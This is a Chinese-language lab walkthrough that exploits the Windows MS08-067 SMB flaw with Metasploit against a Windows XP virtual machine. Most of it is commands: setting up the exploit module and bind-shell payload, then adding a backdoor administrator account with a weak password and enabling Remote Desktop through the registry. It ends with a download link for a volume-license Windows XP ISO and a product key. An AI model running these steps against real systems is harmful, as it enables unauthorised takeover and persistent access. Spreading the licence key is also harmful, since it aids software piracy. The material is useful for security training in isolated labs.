一、概述
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,并成功进行3389登录。
用到的端口:445、3389
二、实验环境(虚拟机搭建)
靶机:windows xp professional sp3 英文版(中文版测试不成功)
攻击平台:Kali Linux
三、攻击过程
1.获取靶机和Kali Linux的IP地址
Windows:DOS窗口输入命令
ipconfig /all
Kali Linux:终端输入命令
ifconfig
并且能相互ping
2.调用Kali Linux中msfconsole工具的ms08-067漏洞攻击模块
以下所有操作都是在Kali Linux的终端中完成
启动msfconsole工具
msfconsole
输入
search ms08-067
(查找漏洞攻击模块)
输入
use exploit/windows/smb/ms08_067_netapi
(使用该模块)
3.配置信息
输入
set LHOST 172.16.165.137
(设置本地IP)
输入
set RHOST 172.16.165.135
(设置Windows IP)
输入
set RPORT 445
(设置端口为445)
输入
show payloads
(显示有效载荷)
输入
set payload generic/shell_bind_tcp
(设置载荷)
输入
set options
(显示并查看配置)
4.实施攻击
输入
exploit
(开始攻击)
此时可以直接远程使用DOS命令对Windows进行操作
5.对Windwos进行远程连接
输入
net user admin pass /add && net localgroup administrators admin /add
(在Windows上创建一个名称为admin密码为pass的用户,并提升为管理员权限)
输入
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
(开启windows远程登录端口)
输入
netstat -an
(检查3389端口是否开启)
接下来重新打开一个终端,输入
rdesktop 172.16.165.135
进行远程登录
回车后会自动弹出如图所示的登录窗口
输入创建的用户名admin和密码pass回车 弹出提示框 点击OK 稍等就会成功远程登录
四、用到的资源
Windows XP SP3 英文版下载地址:
ed2k://|file|en_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-73974.iso|617754624|7d1e7466df638674202dd8e7451c0b39|h=5JYEVQUSWB7WMCVM7JWGPNOIZFNTQXJY|
序列码:DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ